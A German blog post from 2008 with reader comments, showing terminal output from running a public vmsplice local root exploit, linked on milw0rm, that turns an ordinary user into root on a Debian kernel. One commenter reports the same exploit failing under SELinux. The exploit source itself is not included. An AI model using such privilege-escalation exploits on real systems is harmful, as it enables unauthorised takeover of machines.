root-exploit und der bim5elkernel

Februar 11, 2008

http://www.milw0rm.com/exploits/5092

funktioniert ohne probleme hier …

der aktuelle sid/trunk kernel …

konsumer@bim5el:~$ uname -a
Linux bim5el 2.6.24-1-486 #1 Mon Feb 11 01:33:24 UTC 2008 i686 GNU/Linux

und los gehts …

konsumer@bim5el:~$ id
uid=1000(konsumer) gid=1000(konsumer)
konsumer@bim5el:~$ ./test
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e44000 .. 0xb7e76000
[+] root
root@bim5el:~# id
uid=0(root) gid=0(root)
root@bim5el:~#

done

Verfasst von konsumer
Abgelegt in debian, kernel, linux
3 Kommentare »

3 Antworten zu „root-exploit und der bim5elkernel“

  1. Christoph Sagt:

    Februar 16, 2008 um 15:14 -- 1203174846

    Mal ne dumme Frage: Wie übersetzt du das? Bei mir kommt mit gcc 4.1.2 nur Schrott raus, der nicht ausführbar ist (syntax error) und ich würde wirklich gerne testen, ob mir SELinux diesen Exploid vom Hals hält.

    Antworten
  2. Christoph Sagt:

    Februar 16, 2008 um 15:21 -- 1203175294

    Ok, ich hab’s dann doch hinbekommen:

    [chris@wicktop ~]$ uname -a
Linux wicktop.localdomain 2.6.23.15-137.fc8 #1 SMP Sun Feb 10 17:03:13 EST 2008 x86_64 x86_64 x86_64 GNU/Linux
[chris@wicktop ~]$ id
uid=500(chris) gid=500(chris) Gruppen=14(uucp),497(fuse),498(mock),500(chris),501(vboxusers), context=unconfined_u:system_r:unconfined_t:SystemLow-SystemHigh
[chris@wicktop ~]$ ./5092
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x100000000000 .. 0x100000001000
[+] page: 0x100000000000
[+] page: 0x100000000038
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4038
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0x2aaaaaaac000 .. 0x2aaaaaade000
[-] vmsplice: Bad address

    Ätsch! SELinux rocks!

    Antworten
  3. konsumer Sagt:

    Februar 16, 2008 um 15:27 -- 1203175641

    ein tag später war ja das loch unter debian auch schon zu … hätt ich das sagen sollen? :)

    Antworten

Eine Antwort schreiben